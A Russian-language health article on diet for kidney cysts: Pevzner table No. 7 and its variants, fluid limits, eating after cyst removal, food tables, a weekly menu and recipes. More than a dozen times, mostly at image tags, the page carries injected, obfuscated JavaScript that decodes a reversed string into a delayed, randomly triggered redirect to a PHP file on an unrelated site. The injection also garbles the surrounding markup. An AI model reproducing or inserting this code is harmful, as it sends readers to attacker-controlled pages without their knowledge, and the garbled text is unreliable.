Правильное питание при кисте почки

Киста почки — это капсулированное образование врождённого или приобретённого характера в структуре органа, заполненное содержимым различной консистенции. Если опухоль доброкачественная и не нарушает функцию почки, её не оперируют. Врач назначает консервативное лечение, частью которого является диета. В случае удаления кисты в послеоперационном периоде без диетического питания также не обойтись. Результат диеты зависит от правильно составленного меню и добросовестности соблюдения пациентом пищевых рекомендаций доктора.

Необходимость и цель диеты при кисте почки

Вне зависимости от того, в какой части почки располагается киста, она затрагивает функциональные структуры. Это связано со сложным строением органа. Он состоит из коркового и мозгового вещества. Первое — это совокупность почечных телец (нефронов), а второе представлено почечными пирамидами. Нефроны отвечают за продукцию первичной и вторичной мочи (урины). Пирамиды распределяют и выводят продукты фильтрации в малые почечные чашечки, которые в свою очередь собирают жидкость в большие чашки. Последние выводят мочу в почечную лоханку — крупный резервуар почки, покидая который жидкость спускается в мочевой пузырь по мочеточнику. Кроме того, почка имеет развитую сосудистую сеть, включающую вены и артерии различного диаметра.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2018/05/stroenie-pochki-3-728×418.jpg» alt=»строение почки» width=»728″ height=»418″ /> Киста в любой части почки способна нарушить полноценную работу органа, поскольку обязательно затронет одну из функциональных структур

При малых размерах образования работа почки не нарушается. Пока здоровые нефроны и пирамиды преобладают, они компенсируют недоработку со стороны поражённых структур.

Расположение кисты определяет степень функциональных нарушений работы почки. Образование в паренхиме или области малой чашечки менее опасно, нежели таковое в просвете большой чашки или лоханки. Это связано с тем, что в одной почке 6–12 малых чашечек, а больших — не более четырёх. Лоханка вовсе одна, через неё проходит вся моча, которая производится. Чем крупнее структура перекрывается опухолью, тем сложнее урине продвигаться по органу и покидать его. Возможные осложнения — почечная гипертензия (повышение артериального давления), гидронефроз (расширение чашечно-лоханочной системы с последующим отмирание ткани почки), нефропатия (поражение сосудистого аппарата нефронов).

При бессимптомном течении кисты почки человеку достаточно придерживаться принципов рационального питания. Специальная диета назначается тогда, когда образование провоцирует нарушения в работе почек и всего организма.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2018/05/spina-i-pochki.jpg» alt=»спина и почки» width=»660″ height=»440″ /> Если киста почки вызывает осложнения и неприятные симптомы, без специальной диеты не обойтись

Цель диеты — создать благоприятные условия для полноценной работы почки, чтобы предотвратить общие и локальные осложнения.

Лечебное питание: правила и принципы

При неосложнённой кисте почки с умеренно выраженной симптоматикой назначается диета №7 по Певзнеру.

Разработанная в 30-х годах прошлого столетья профессором М. И. Певзнером система диетических столов актуальна и сегодня. Каждая из пятнадцати диет применима для определённой группы заболеваний.

Диета №7 изначально использовалась при нефрите (воспалении почек различного рода), но затем получила более широкое применение. Стол рекомендуется при почечных заболеваниях, в том числе при кисте. Ведь болезни почек при всём разнообразии провоцируют сходные симптомы и последствия. К примеру, пиелонефрит, гломерулонефрит, гидронефроз, нефроптоз и кистозное образование характеризуются неприятными ощущениями в поясничной области, способствуют появлению отёков и могут вызвать почечную и сердечно-сосудистую недостаточность. Исключение составляет мочекаменная болезнь, поэтому для неё предусмотрен отдельный стол.

Принципы диеты №7:

  • Снижение количества употребляемой соли до 5 граммов за сутки. В чистом виде это одна чайная ложка без горки. Такое ограничение обусловлено тем, что избыток соли ведёт к осложнённой работе почек и отёкам тела.
  • Оптимизация соотношение в рационе белков, жиров и углеводов (1:1:2). Такой баланс позволяет организму получать всё необходимое без избыточной нагрузки на пищеварение. Рекомендованный суточный калораж — 2200–2400 ккал.
  • Дробность питания. Пища должна поступать в организм 5–6 раз в день равномерными небольшими порциями, чтобы в течение дня нагрузка не только на почки, но и на желудок была равномерной.
    $nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2018/05/chasy-i-blyuda.jpg» alt=»часы и блюда» width=»510″ height=»404″ /> Важно питаться дробно, чтобы чувствовать себя хорошо и не перегружать органы выделения, в том числе почки
  • Разнообразие пищевых ингредиентов и блюд позволит организму получать все необходимые витамины и минералы.
  • Кулинарная обработка допускается разнообразная, за исключением копчения и засаливания. Не стоит злоупотреблять жареным, а от продуктов высокой степени прожарки лучше вовсе отказаться.

Откажитесь от полуфабрикатов и фастфуда. В таких продуктах не только много соли, но также присутствуют ароматизаторы, усилители вкуса, красители, обилие пряностей.

Диеты в зависимости от особенностей заболевания

Киста почки может протекать на фоне прочих заболеваний или провоцировать их появление. Тогда в силу вступают дополнительные рекомендации по питанию. Их разнообразие привело к появлению столов 7а, 7б, 7в и 7г, каждый из которых предусматривает ограничения в зависимости от сопутствующих недугов и патологических состояний.

Таблица: особенности столов 7а, 7б, 7в, 7г

Параметры диеты Диета №7а Диета №7б Диета №7в Диета №7г
Показания к применению Острая почечная недостаточность Хроническая почечная недостаточность, нефрит лёгкой степени. Также назначают после диеты 7а при азотемии (повышенного содержания азота в крови) Киста на фоне нефротического синдрома Тотальная почечная недостаточность, в том числе на фоне опухоли, пациентам на гемодиализе
Задачи Максимальное снижение нагрузки на почки, выведение из организма азотистых веществ (продуктов обмена белка) Устранение дефицита белка в организме, отёков тела, ликвидация протеинурии (белка в моче), снижение холестерина в крови Насыщение организма больного необходимыми питательными веществами с минимальной выработкой побочных продуктов обмена
Длительность Не более 20 дней До нормализации содержания азота в крови либо до отмены доктором До отмены в связи с нормализацией состояния Пожизненно или до момента трансплантации почки
Калорийность рациона в сутки Не более 2200 ккал До 2400 ккал 2800 ккал 3000 ккал
Количество соли Полностью исключается 3–5 гр в сутки Не более 2 гр
Количество белка Не более 20 гр в сутки До 40 гр 120 гр, 65–70% из которых животного происхождения Не более 60 гр в сутки
Запрещается Рыба и мясо любых сортов, бобовые, любые пряности, грибы, продукты с солью в составе Жирные сорта мяса и рыбы, сдобные мучные изделия, блюда с грибами, бобами, отвары животного происхождения Сахар в чистом виде, минимизировать употребление простых углеводов (их содержат различные сладости). Ограничить экстрактивные вещества (отвары) Сводят к минимуму продукты, обогащённые калием (картофель, сухофрукты, орехи, лосось, шпинат, авокадо и пр.) и растительный белок
Термическая обработка Запекание, отваривание, приготовление на пару, лёгкое обжаривание Предпочтительна отварная, запечённая, приготовленная на пару пища Отваривание
Количество приёмов пищи 4–5 5–6 6 раз, дробно

Если доктор на некоторое время исключает соль из рациона, это не должно вызывать беспокойство пациента. Соль — соединение, в основе которого лежит натрий. Это важный микроэлемент для работы всего организма. Натрий содержится во многих продуктах растительного и животного происхождения. Благодаря этому на сегодня существует понятие о скрытой соли в продуктах питания. Некоторые специалисты полагают, что человек может вовсе не употреблять соль в чистом виде, поскольку получает её с избытком даже из полезной еды, не говоря о вредной.

Питьевой режим

Если установлено наличие кисты почки, но симптомы отсутствуют, можно не ограничивать количество употребляемой жидкости. Исключите алкоголь, газированную воду, напитки с ароматизаторами и красителями, особенно энергетические.

В случае проявлений, которые говорят о прогрессировании заболевания (отёки, повышение цифр АД, рост опухоли, присоединение воспалительного процесса, плохие результаты анализов), необходимо сократить количество жидкости до полутора литров за сутки с целью снижения нагрузки на почки. Рекомендация дополняет диету №7.

Диета 7а предполагает более жёсткие ограничения — не боле 0,5 л жидкости в сутки.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2018/05/kuvshin-s-vodoy-i-stakan-728×569.jpg» alt=»кувшин с водой и стакан» width=»728″ height=»569″ /> Если врач ограничил суточное потребление жидкости до минимума, пользуйтесь ёмкостями, которые позволят чётко определить количество выпито

Стол 7б допускает повышение количества жидкости на 100 мл по сравнению с 7а.

При диетах 7в и 7г больному запрещено употреблять более 0,7–0,8 л.

Количество потребляемой жидкости при всех разновидностях диеты №7 определяется с учётом не только воды, но также чая, супа, компота и других жидких блюд. Чем тяжелее состояние больного, тем предпочтительнее пить чистую воду. При употреблении многокомпонентных и ярких жидкостей фильтрационные клубочки почечных клеток работают в усиленном режиме. В подтверждение тому — изменение цвета и запаха мочи даже у здорового человека под воздействием некоторых веществ. К примеру, если выпить много морковного сока, урина приобретёт оранжевый оттенок, а от крепкого чёрного чая может потемнеть. Избыток витамина С придаёт моче характерный «аскорбиновый» запах. Подобные наблюдения говорят о том, что даже нормально работающая почка не всегда способна очистить мочу от посторонних примесей. Последние раздражают мочевыводящие пути органа, что недопустимо при кисте, особенно осложнённой.

Почечные отёки формируются ночью и более заметны утром, поэтому за несколько часов до сна употребление жидкости сведите к минимуму.

Диетический стол после удаления кисты

Устранение кисты производится несколькими способами, которые предполагают различный объём вмешательства. Подход к диете в постоперационном периоде также отличается:

  • Пункционная склеротерапия — проводится для простых кист под местной анестезией. В области поясницы специальной иглой делается прокол, содержимое опухоли выкачивается, а затем вводится склеивающее стенки образования вещество. Процедура не требует специальных диет, кроме общепринятого рационального питания.
  • Лапороскопическое удаление кисты делается под кратковременной общей анестезией через небольшие надрезы, в которые вводят инструментарий. Извлекаются малые, крупные однокамерные, многокамерные кисты среднего размера. Вмешательство малоинвазивное, поэтому больной проводит в стационаре 2–3 дня. В первые сутки после операции разрешается пить небольшими глотками (не более 0,5 л воды). На второй день вводят лёгкую полужидкую еду — нежирный кефир, йогурт, куриный бульон, картофельный отвар. В течение недели рацион постепенно расширяется. Сначала разрешают протёртые супы, затем пюреобразные блюда. Допустимо употребление не более 5 граммов соли в день. Спустя неделю врач рекомендует седьмой стол как минимум на месяц.
    $nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2018/05/tarelki-s-edoy-na-podnose.jpg» alt=»тарелки с едой на подносе» width=»700″ height=»523″ /> Диетическое питание после удаления кисты почки необходимо с целью профилактики послеоперационных осложнений
  • Открытая операция по иссечению кисты осуществляется при крупных размерах образования, которое охватывает значительную часть почки. Вмешательство сложное и травматичное, поэтому больной проводит в стационаре не менее недели. Питание в первые 7 дней такое же, как в предыдущем случае, но впоследствии пациенту рекомендуется диета №7 сроком на 6–12 месяцев.
  • Открытое вмешательство с односторонней нефрэктомией (удалением почки) — отличается в плане питания тем, что почечная диета необходима пожизненно. Человек должен помнить, что вся функция мочевыделения ложится на оставшийся орган, поэтому его нужно щадить. В случае угрозы почечной недостаточности больной придерживается диеты 7а, при развитии нефрита оставшейся почки необходим стол 7б.

Диетическое питание после любой операции по удалению кисты почки поможет не набрать лишний вес. Это важно ввиду того, что в первые несколько месяцев доктор назначает щадящий двигательный режим.

Таблица: разрешённые и запрещённые продукты

Продукты Разрешается Запрещается
Крупы Любые, но предпочтение гречневой и овсяной
Овощи Огурцы, помидоры, болгарский перец (ограниченно), капуста пекинская. При термической обработке — любые овощи, но с ограничением тех, в которых много красящих веществ (свёкла, морковь) В сыром виде — лук, чеснок, редис, острый перец
Зелень Укроп, петрушка, листья салата, базилик, шпинат в готовом и сыром виде
Бобовые Запрещены
Макаронные изделия Из твёрдых сортов Из муки высшего сорта
Фрукты Яблоко, груша, дыня, арбуз. Банан, лимон, виноград — ограниченно. Цитрусовые, ананас, кислые фрукты
Ягоды Смородина, малина, брусника, клюква, черника
Грибы Запрещены
Рыба, морепродукты Нежирная рыба, морепродукты в небольшом количестве Жирные сорта рыбы
Мясо Нежирные сорта (мясо курицы, индюшка, кролика, перепёлки, телятины — изредка) Жирное мясо (свинина, баранина, утка, гусь)
Яйца Куриные — одно в сутки, перепелиные — 1–3 в день
Молочные продукты Кефир, творог, молоко с низким процентом жирности (не более 1%), нежирная сметана Плавленый, копчёный, солёный сыр, цельное молоко, сливки
Выпечка Овсяное и галетное печенья, сушки, хлеб с отрубями, из овсяной и кукурузной муки Сдоба, изделия из муки высшего сорта с сахаром
Первые блюда Овощные отвары Мясные, рыбные, грибные бульоны
Масла Растительные: оливковое, льняное, подсолнечное рафинированное Спред, сливочное масло, маргарин
Орехи Запрещены
Сухофрукты Любые в небольшом количестве
Сладости Натуральный мармелад и зефир, мёд, домашние сладкие варенья Пирожные, конфеты, шоколад, сахарозаменители, сахар
Напитки Компоты из свежих ягод и фруктов, кисели, ягодный морс, некрепкий или травяной чай, хлоридно-кальциевая минеральная вода без газа, отвар шиповника, травяные сборы (после разрешения врача) Газированные напитки, томатный и цитрусовый соки, кофе, чай, алкоголь
Консервы Запрещены
Полуфабрикаты, фастфуд, колбасы, соления, копчёности Запрещены
Специи В ограниченном количестве натуральные сушёные травы — базилик, укроп, паприка, лимонная цедра и другие Комплексные приправы с усилителями вкуса, солью, ароматизаторами искусственного происхождения
Соусы, кетчуп, майонез Запрещены

Фотогалерея: опасная еда при кисте почки

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toplay=»true» fg_allowfullscreen=»true» fg_arrow=»true» fg_loop=»true» ids=»33413,33412,33411,33410,33409,33408,33407″]

Ежедневное питание

Чтобы ежедневное питание не казалось однообразным, следует составлять меню на неделю вперёд.

Старайтесь, чтобы в течение семи дней блюда повторялись как можно реже, особенно первое время. Это поможет адаптироваться к любой диете психологически. Неплохо, если еда будет выглядеть ярко и красиво. Потратьте две минуты на оформление простого гарнира зеленью, порежьте фрукты аккуратными ломтиками, положите кусочек отварного мяса или рыбы на красивую тарелку и т. д. Когда положительные результаты рационального питания станут заметны вам и окружающим, психологические приёмы отойдут на второй план.

Таблица: примерное меню на неделю при кисте почки (на основе стола №7)

Понедельник Вторник Среда Четверг Пятница Суббота Воскресение
Первый завтрак
  • Овсяная каша с курагой и ложкой мёда;
  • чай зелёный;
  • сушка несладкая (2–3 шт.)
  • Овощная запеканка с цветной капустой;
  • хлеб из кукурузной муки;
  • настой шиповниковый
  • Творожная запеканка с клубникой;
  • печенье галетное (4–5 шт.);
  • чай травяной
  • Яйцо пашот;
  • кукурузная каша;
  • салат из пекинской капусты с оливковым маслом;
  • компот из малины и шиповника
  • Творог нежирный с сезонными ягодами и мёдом;
  • чай чёрный некрепкий
  • Омлет на пару с зеленью;
  • чёрный хлеб;
  • творожно-сметанный соус;
  • компот из сухофруктов
  • Зелёная гречка;
  • тушёная капуста без томата;
  • творожная масса с изюмом;
  • чай из сушёных ягод
Второй завтрак
  • Банан — 1/2 шт.;
  • компот
  • Кисель молочный
  • Зефир — 1 шт.;
  • чай зелёный
  • Стакан молока
  • Мармелад;
  • хлебцы из овсяной муки
  • Отварные перепелиные яйца — 4 шт.
  • Смузи из ягод
Обед
  • Крем-суп из шпината;
  • отварное филе хека;
  • хлеб с отрубями;
  • чай липовый
  • Гречневый суп на воде;
  • сухари из ржаного хлеба;
  • паровая котлета из филе индюка;
  • чай зелёный
  • Тыквенный крем-суп со сметаной;
  • хлебцы с отрубями;
  • чай с лимоном
  • Борщ на воде с обесцвеченной свёклой;
  • сметана — 1 ст. ложка;
  • настой на ветках малины и чёрной смородины
  • Манный суп с овощами;
  • фрикадельки куриные;
  • морс клюквенный
  • Щи со свежей и кислой капустой;
  • сухари из белого хлеба;
  • отварной кальмар;
  • чай травяной
  • Крем-суп морковный;
  • запеканка из нежирной рыбы;
  • кисель фруктовый
Полдник
  • Кисель ягодный
  • Яйцо куриное;
  • компот из яблок
  • Яблоко — 1 шт.;
  • адыгейский сыр несолёный — 1 кусочек
  • Йогурт натуральный без наполнителей
  • Кисель абрикосовый
  • Морс ягодный;
  • печенье галетное
  • Арбуз
Ужин
  • Куриная грудка, запечённая с помидорами и луком;
  • отварной дикий рис;
  • чай зелёный
  • Запечённый тунец с луком;
  • каша пшеничная;
  • свежий огурец;
  • чай с мятой
  • Салат со свежим шпинатом, огурцами, жёлтыми помидорами и оливковым маслом;
  • куриное филе отварное;
  • компот с малиной и чёрной смородиной
  • Картофель тушёный с кабачками;
  • рыбная котлета из минтая на пару;
  • зелёный чай
  • Тефтели с телятиной и рисом на воде;
  • салат из свежих огурцов с зеленью;
  • компот с грушами и яблоками
  • Пюре картофельное с молоком;
  • тушёная морковь с болгарским перцем;
  • чай зелёный с мятой
  • Макароны из твёрдых сортов пшеницы по-флотски с мясом курицы;
  • овощной салат;
  • чай с лимоном

Каждую неделю можно составлять новое меню или менять его составляющие в зависимости от наличия сезонных ягод, овощей и фруктов.

Фотогалерея: блюда и продукты, незаменимые для больных с кистой почки

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toplay=»true» fg_allowfullscreen=»true» fg_arrow=»true» fg_loop=»true» ids=»33421,33420,33418,33419″]

Рецепты

Почечная диета допускает употребление широкого спектра продуктов, из которых можно создавать полезные и вкусные блюда. Следующие рецепты предполагают использование доступных продуктов и простой способ приготовления.

Куриная грудка, запечённая с помидорами и луком

Ингредиенты (1 порция):

  • куриное филе без кости (1/2 грудки) — 1 шт.;
  • помидор свежий — 1–2 шт.;
  • лук репчатый — 1 шт.;
  • сметана — 2 ст. ложки;
  • сушёный укроп, петрушка, щепотка соли;
  • листья салата.

Приготовление:

  1. В углублённой ёмкости смешать сметану, петрушку, укроп и соль.
  2. Филе куриное очистить от шкурки (если есть), сделать поперечные разрезы на половину глубины мяса.
    $nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2018/05/file-kuricy-s-razrezami.png» alt=»филе куриное с разрезами» width=»600″ height=»370″ /> Поперечные разрезы на курином филе делаются аккуратно, чтобы не разделить его на части
  3. Погрузить филе в сметанный маринад, полностью обмазать им мясо, затем оставить его мариноваться на 15–20 минут.
  4. Лук и помидоры нарезать полукольцами.
  5. Выложить филе на противень, покрытый фольгой.
  6. В каждый разрез вложить по кусочку лука и помидора.
    $nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2018/05/file-na-folge.jpg» alt=»филе на фольге» width=»552″ height=»331″ /> Фаршировать куриное филе лучше сразу на фольге, чтобы не растерять овощи при переносе на противень
  7. Завернуть филе в фольгу и поставить в предварительно разогретую до 180о С духовку.
  8. Запекать 15–20 минут (в зависимости от размера).
  9. Готовое мясо выложить на тарелку, предварительно украшенную листьями салата.
    $nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2018/05/gotovoe-farshirovannoe-kurinoe-file.jpg» alt=»готовое фаршированное куриное филе» width=»600″ height=»353″ /> Готовое куриное филе с помидорами и натуральными пряностями имеет приятный аромат и нежный вкус

Картофель с кабачками

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2018/05/kartofel-s-kabachkami-na-blyude.jpg» alt=»картофель с кабачками на блюде» width=»700″ height=»350″ /> Овощное блюдо из картофеля и кабачков актуально в летний период

Ингредиенты:

  • картофель — 2–3 шт.;
  • кабачок 1–2 шт.;
  • небольшой лук-порей или головка репчатого;
  • сметана — 150–200 г;
  • щепотка соли;
  • немного чёрного перца, сушёный базилик.

Приготовление:

  1. Картофель нарезать кубиками среднего размера, слегка обжарить на рафинированном масле, засыпать в котелок.
  2. Нарезать мелко лук-порей и посыпать картошку сверху. Если используете репчатый лук, припустите его на сковороде.
  3. Кабачки также нарезать кубиками, немного поджарить и насыпать поверх лука.
  4. Добавить 400–450 мл воды.
  5. Тушить 10 минут после закипания.
  6. Полить сметаной и потушить ещё 5 минут.
  7. Соль и травы добавить перед подачей блюда к столу.

Чтобы вкус блюда был более нежным, используйте кабачки золотистого цвета, цукини или патиссоны.

Тунец с луком

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2018/05/tunec-zapechennyy-s-lukom.jpg» alt=»тунец запечённый с луком» width=»640″ height=»355″ /> Запечённый тунец — диетическое блюдо, богатое микроэлементами и полезным белком, который легко усваивается

Ингредиенты:

  • тунец среднего размера — 1 шт.;
  • лук репчатый средний — 1 шт.;
  • сметана — небольшая упаковка;
  • соль;
  • натуральные специи.

Этапы приготовления:

  1. Очистить и выпотрошить рыбу, отрезать голову.
  2. Тушку порезать на равномерные небольшие кусочки.
  3. Лук порезать полукольцами, добавить миску с рыбой.
  4. Сверху посыпать специями, солью, полить сметаной.
  5. Перемешать и поставить рыбу мариноваться на 60 минут в холодильник.
  6. Выложить кусочки рыбы на предварительно смазанный растительным маслом противень, сверху посыпать луком.
  7. Запекать при температуре 180о 40 минут.

Видео: простой рецепт запечённого тунца

Результат диеты

Когда пациент с кистой почки начинает придерживаться рекомендованной диеты, его самочувствие быстро улучшается. Уменьшаются либо исчезают отёки. Если есть болевой синдром — он полностью уходит или беспокоит человека реже. Пациенты с избыточным весом постепенно теряют лишние килограммы, за счёт чего их жизнь становится легче. При склонности к артериальной гипертензии диетическое питание позволяет немного снизить показатели артериального давления за счёт того, что жидкость быстрее выводится, а значит не увеличивает объём циркулирующей крови.

Но диета не всегда способна избавить больного от осложнений и дискомфортной симптоматики, особенно при огромных размерах образования и склонности его к озлокачествлению. В таком случае опухоль удаляется. Затем следует послеоперационный период, во время которого также требуется правильное питание. Здоровая пища снижает риск развития осложнений в несколько раз. Сокращается восстановительный период повреждённых во время операции тканей.

Если человек хотя бы однажды столкнулся с кистозными образованиями в почках, мнение докторов таково, что придерживаться диеты следует на протяжении всей последующей жизни. Это необходимо с целью профилактики рецидива и оптимизации деятельности почек.

Правильно подобранная диета при кисте почки — важная составляющая в терапии недуга. Оптимальной считается диета №7, учитывающая особенности заболевания и необходимость организма в полноценном питании. При осложнениях кистоза с нарушением функции почек рекомендуются разновидности седьмого стола, которые зависят от клинической картины. Меню составляется согласно общих рекомендаций, но индивидуально для каждого больного. Человеку следует освоить рецепты простых блюд из разрешённых продуктов. Если нужна коррекция питания по состоянию здоровья — обращайтесь за консультацией к лечащему врачу.

Adblock
detector